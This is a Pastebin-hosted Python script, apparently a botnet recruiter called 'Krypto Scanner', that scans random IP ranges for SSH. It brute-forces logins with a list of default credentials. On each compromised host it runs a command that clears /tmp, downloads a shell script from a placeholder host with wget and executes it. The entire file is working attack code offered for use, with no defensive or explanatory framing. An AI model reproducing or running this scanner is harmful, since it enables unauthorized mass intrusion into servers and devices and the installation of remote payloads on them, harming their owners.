Advertisement
KappaMoDz

Krypto Scanner

Feb 11th, 2018
423
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.74 KB | None | 0 0
  1. # coding: utf-8
  2. #!/usr/bin/env python
  3. import threading, paramiko, random, socket, time, sys
  4.  
  5. print (' ██ ▄█▀ ██▀███ ▓██   ██▓ ██▓███  ▄▄▄█████▓ ▒█████       ██████  ▄████▄   ▄▄▄       ███▄    █  ███▄    █ ▓█████  ██▀███   ')
  6. print ('   ██▄█▒ ▓██ ▒ ██▒▒██  ██▒▓██░  ██▒▓  ██▒ ▓▒▒██▒  ██▒   ▒██    ▒ ▒██▀ ▀█  ▒████▄     ██ ▀█   █  ██ ▀█   █ ▓█   ▀ ▓██ ▒ ██▒')
  7. print (' ▓███▄░ ▓██ ░▄█ ▒ ▒██ ██░▓██░ ██▓▒▒ ▓██░ ▒░▒██░  ██▒   ░ ▓██▄   ▒▓█    ▄ ▒██  ▀█▄  ▓██  ▀█ ██▒▓██  ▀█ ██▒▒███   ▓██ ░▄█ ▒')
  8. print (' ▓██ █▄ ▒██▀▀█▄   ░ ▐██▓░▒██▄█▓▒ ▒░ ▓██▓ ░ ▒██   ██░     ▒   ██▒▒▓▓▄ ▄██▒░██▄▄▄▄██ ▓██▒  ▐▌██▒▓██▒  ▐▌██▒▒▓█  ▄ ▒██▀▀█▄  ')
  9. print (' ▒██▒ █▄░██▓ ▒██▒ ░ ██▒▓░▒██▒ ░  ░  ▒██▒ ░ ░ ████▓▒░   ▒██████▒▒▒ ▓███▀ ░ ▓█   ▓██▒▒██░   ▓██░▒██░   ▓██░░▒████▒░██▓ ▒██▒')
  10. print ('  ▒ ▒▒ ▓▒░ ▒▓ ░▒▓░  ██▒▒▒ ▒▓▒░ ░  ░  ▒ ░░   ░ ▒░▒░▒░    ▒ ▒▓▒ ▒ ░░ ░▒ ▒  ░ ▒▒   ▓▒█░░ ▒░   ▒ ▒ ░ ▒░   ▒ ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░')
  11. print ('  ░ ░▒ ▒░  ░▒ ░ ▒░▓██ ░▒░ ░▒ ░         ░      ░ ▒ ▒░    ░ ░▒  ░ ░  ░  ▒     ▒   ▒▒ ░░ ░░   ░ ▒░░ ░░   ░ ▒░ ░ ░  ░  ░▒ ░ ▒░')
  12. print ('  ░ ░░ ░   ░░   ░ ▒ ▒ ░░  ░░         ░      ░ ░ ░ ▒     ░  ░  ░  ░          ░   ▒      ░   ░ ░    ░   ░ ░    ░     ░░   ░ ')
  13. print ('  ░  ░      ░     ░ ░                           ░ ░           ░  ░ ░            ░  ░         ░          ░    ░  ░   ░     ')
  14. print ('                  ░ ░                                            ░                                                        ')
  15. print ('Credit to Kappa MoDz & Lord GuRu')
  16.  
  17. paramiko.util.log_to_file("Krypto.log")
  18.  
  19. blacklist = [
  20.     '127'
  21. ]
  22.  
  23. passwords = [
  24.     "root:root",
  25.     "root:admin",
  26.     "admin:admin",
  27.     "ubnt:ubnt"
  28.     "root:1234",
  29.     "admin:1234",
  30.     "guest:guest",
  31.     "user:user",
  32.     "test:test",
  33.     "pi:raspberry",
  34.     "vagrant:vagrant",
  35.     "root:toor",
  36.     "root:admin",
  37.     "root:1234",
  38.     "root:maxided",
  39.     "root:pi",
  40.     "root:alpine",
  41.     "root:r00tnull3d",
  42.     "root:r00tnull3d#",
  43.     "root:rootnull3d#",
  44.     "root:password",
  45.     "root:centos6svm",
  46.     "root:1234",
  47.     "root:123456",
  48.     "root:Love2020",
  49.     "root:Zero",
  50.     "root:Password",
  51.     "root:password",
  52.     "root:qwerty",
  53.     "root:dragon",
  54.     "root:pussy",
  55.     "root:baseball",
  56.     "root:football",
  57.     "root:monkey",
  58.     "root:696969",
  59.     "root:abc123"
  60.     "admin:admin",
  61.     "admin:1234",
  62.     "admin:Guest",
  63.     "ubnt:ubnt",
  64.     "guest:guest",
  65.     "user:user",
  66.     "test:test",
  67.     "pi:raspberry",
  68.     "vagrant:vagrant",
  69.     "localhost:root",
  70.     "B1NARY:B1NARY",
  71.     "tim:tim",
  72.     "CISCO:CISCO",
  73.     "netgear"
  74.     "support:support",
  75.     "oracle:oracle",
  76.     "cusadmin:password",
  77. ]
  78.  
  79. if sys.argv[4] == '1':
  80.     passwords = ["root:root", "root:admin", "admin:1234"]
  81.  
  82. jackmeoff = random.choice(["start exploiting!"])
  83. raw_input('Press <ENTER> To '+jackmeoff)
  84.  
  85. ipclassinfo = sys.argv[2]
  86. if ipclassinfo == "A":
  87.     ip1 = sys.argv[3]
  88. elif ipclassinfo == "B":
  89.     ip1 = sys.argv[3].split(".")[0]
  90.     ip2 = sys.argv[3].split(".")[1]
  91. elif ipclassinfo == "C":
  92.     ips = sys.argv[3].split(".")
  93.     num=0
  94.     for ip in ips:
  95.         num=num+1
  96.         if num == 1:
  97.             ip1 = ip
  98.         elif num == 2:
  99.             ip2 = ip
  100.         elif num == 3:
  101.             ip3 = ip
  102. class sshscanner(threading.Thread):
  103.     global passwords
  104.     global ipclassinfo
  105.     if ipclassinfo == "A":
  106.         global ip1
  107.     elif ipclassinfo == "B":
  108.         global ip1
  109.         global ip2
  110.     elif ipclassinfo == "C":
  111.         global ip1
  112.         global ip2
  113.         global ip3
  114.     def run(self):
  115.         while 1:
  116.             try:
  117.                 while 1:
  118.                     thisipisbad='no'
  119.                     if ipclassinfo == "A":
  120.                         self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  121.                     elif ipclassinfo == "B":
  122.                         self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  123.                     elif ipclassinfo == "C":
  124.                         self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  125.                     elif ipclassinfo == "BRAZIL":
  126.                         br = [Range Here]
  127.                         self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  128.                     elif ipclassinfo == "VPS":
  129.                         yeet = [Range Here]
  130.                         self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  131.                     elif ipclassinfo == "LUCKY":
  132.                         lucky = [Range Here]
  133.                         self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  134.                     elif ipclassinfo == "LUCKY2":
  135.                         lucky2 = [Range Here]
  136.                         self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  137.                     elif ipclassinfo == "RAND":
  138.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  139.                     elif ipclassinfo == "INTERNET":
  140.                         lol = [Range Here]
  141.                         self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  142.                     else:
  143.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  144.                     for badip in blacklist:
  145.                         if badip in self.host:
  146.                             thisipisbad='yes'
  147.                     if thisipisbad=='no':
  148.                         break
  149.                 username='root'
  150.                 password=""
  151.                 port = 22
  152.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  153.                 s.settimeout(3)
  154.                 s.connect((self.host, port))
  155.                 s.close()
  156.                 ssh = paramiko.SSHClient()
  157.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  158.                 dobreak=False
  159.                 for passwd in passwords:
  160.                     if ":n/a" in passwd:
  161.                         password=""
  162.                     else:
  163.                         password=passwd.split(":")[1]
  164.                     if "n/a:" in passwd:
  165.                         username=""
  166.                     else:
  167.                         username=passwd.split(":")[0]
  168.                     try:
  169.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  170.                         dobreak=True
  171.                         break
  172.                     except:
  173.                         pass
  174.                     if True == dobreak:
  175.                         break
  176.                 badserver=True
  177.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  178.                 output = stdout.read()
  179.                 if "inet addr" in output:
  180.                     badserver=False
  181.                 if badserver == False:
  182.                         print '\x1b[0;35mFound -> Exploiting -> SSH -> Joined \x1b[0;32m'+self.host+' \x1b[0;36m'+username+' \x1b[0;35m'+password+' \x1b[0;32m'+str(port)
  183.                         ssh.exec_command("cd /tmp; rm -rf *; wget -q http://iphere/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *\r\n")
  184.                         time.sleep(20)
  185.                         ssh.close()
  186.             except:
  187.                 pass
  188.  
  189. for x in range(0,int(sys.argv[1])):
  190.     try:
  191.         t = sshscanner()
  192.         t.start()
  193.     except:
  194.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement